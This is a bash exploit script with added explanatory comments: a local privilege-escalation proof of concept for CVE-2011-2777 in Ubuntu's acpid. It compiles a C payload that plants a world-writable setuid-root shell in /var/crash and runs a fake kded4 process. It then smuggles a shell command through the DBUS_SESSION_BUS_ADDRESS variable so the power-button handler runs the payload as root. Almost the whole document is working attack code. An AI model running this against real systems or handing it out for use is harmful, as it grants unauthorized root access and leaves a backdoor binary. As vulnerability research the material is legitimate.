##################################################################
# Exploit Title: Acpid Privilege Boundary Crossing Vulnerability #
# Google Dork: #
# Date: 23-11-2011 #
# Author: otr #
# Software Link: https://launchpad.net/ubuntu/+source/acpid #
# Version: 1:2.0.10-1ubuntu2 #
# Tested on: Ubuntu 11.10, Ubuntu 11.04 #
# CVE : CVE-2011-2777 #
##################################################################
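#!/bin/bash
# NOTE(review): as published, the comment header above precedes this
# shebang, so the kernel will not honour it -- run the script explicitly
# with `bash <script>`.
#
# Local privilege escalation PoC for CVE-2011-2777 (acpid, Ubuntu).
# What this script itself does:
#   1. Builds a small C payload in /var/crash.  Started under any argv[0]
#      that does not contain "shell", it copies itself to /var/crash/shell
#      and makes the copy setuid/setgid root (this only works when the
#      copy is made by a process allowed to chown to uid 0).  Started as
#      /var/crash/shell, it just execs an interactive /bin/sh.
#   2. Builds a dummy program named "kded4" that polls for /var/crash/shell
#      and execs it as soon as it appears.
#   3. Exports DBUS_SESSION_BUS_ADDRESS containing a shell command
#      ("xxx & /var/crash/payload") and runs the dummy kded4 under it.
# The power-button handler ($TRIGGER) is presumably what picks that
# variable out of a kded4 process environment and evaluates it with
# elevated privileges when the power button is pressed -- that part is
# not in this file; see the CVE for the actual vulnerable code.
#
# Side effects a tester should be aware of:
#   * umask 0 makes every file this script creates world-writable
#     (mode 0777 for the binaries), so any other local user could replace
#     the payload between compile time and the power-button press.
#   * On success a world-writable setuid/setgid-root binary is left at
#     /var/crash/shell.  Remove it when you are done.
#   * The "shell" branch of the payload execs /bin/sh without calling
#     setuid(0) first; whether the resulting shell keeps euid 0 depends on
#     which shell /bin/sh is.
set -u

PAYLOADEXE="/var/crash/payload"
PAYLOADC="/var/crash/payload.c"
KDEDC="kded4.c"
KDEDEXE="kded4"
TRIGGER="/etc/acpi/powerbtn.sh"   # the vulnerable handler; informational only

# Print an error and abort.
die() { printf '[-] %s\n' "$*" >&2; exit 1; }

# Preconditions: the payloads are compiled locally, and without the
# handler present this target is most likely not affected at all.
command -v gcc >/dev/null 2>&1 || die "gcc not found; the payload is compiled on the target."
[[ -e "$TRIGGER" ]] || printf '[!] %s not found; this target may not be affected.\n' "$TRIGGER" >&2

# Remove artifacts from a previous run.
rm -f -- "$PAYLOADEXE" "$KDEDEXE" "$KDEDC" "$PAYLOADC"

echo "[+] Setting umask ke 0 untuk writable files."
# umask 0: everything created below is 0666/0777, so whatever account the
# handler runs the payload as can read and execute it.  (Also see the
# caveat in the header: the files are writable by everyone, too.)
umask 0

echo "[+] Preparing binary payload."
# Try to obtain a setuid-root shell; if the payload is only run as some
# unprivileged user we merely end up with a shell as that user.
# The delimiter is quoted so the C source is written verbatim (no shell
# expansion of $ or backslashes inside the heredoc).
cat > "$PAYLOADC" <<'_EOF'
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Run under any name other than "shell": copy ourselves to
 * /var/crash/shell and make the copy setuid/setgid root.
 * Run as /var/crash/shell: exec an interactive shell. */
int main(int argc, char **argv)
{
    if (argv[0] == NULL || !strstr(argv[0], "shell")) {
        printf("[+] Preparing suid shell.\n");
        system("cp /var/crash/payload /var/crash/shell");
        setuid(0);
        setgid(0);
        chown("/var/crash/shell", 0, 0);
        /* 06777: world-writable setuid/setgid binary -- clean it up afterwards. */
        chmod("/var/crash/shell",
              S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID);
    } else {
        execl("/bin/sh", "/bin/sh", "-i", (char *)0);
    }
    return 0;
}
_EOF
gcc -o "$PAYLOADEXE" "$PAYLOADC" || die "failed to compile $PAYLOADC"

echo "[+] Preparing fake kded4 process."
cat > "$KDEDC" <<'_EOF'
#include <stdlib.h>
#include <unistd.h>

/* Dummy "kded4": exists only to carry the injected
 * DBUS_SESSION_BUS_ADDRESS in its environment.  It polls once a second
 * until the setuid shell appears, then execs it.  argv[0] contains
 * "shell", so the payload takes its exec-/bin/sh branch. */
int main(void)
{
    for (;;) {
        sleep(1);
        if (access("/var/crash/shell", F_OK) != -1) {
            execl("/var/crash/shell", "/var/crash/shell", "-i", (char *)0);
            return 1; /* only reached if execl failed */
        }
    }
}
_EOF
gcc -o "$KDEDEXE" "$KDEDC" || die "failed to compile $KDEDC"
rm -f -- "$KDEDC" "$PAYLOADC"

echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS."
# Not a bus address at all: the value is a command line.  Presumably the
# handler expands it unquoted in a shell, where "xxx" is a no-op and the
# payload is started in the background.
export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE"

echo "[+] Starting kded4."
echo "[+] Trying to PMS the system."
echo "[+] Menunggu Tombol power di tekan ."
echo "[+] anda akan mendapatkan shell pada console ini."
# Runs in the foreground.  Once the payload has fired, this process image
# is replaced by /var/crash/shell and then /bin/sh, so control returns to
# this script only after that shell exits.
"./$KDEDEXE"
rm -f -- "$KDEDEXE"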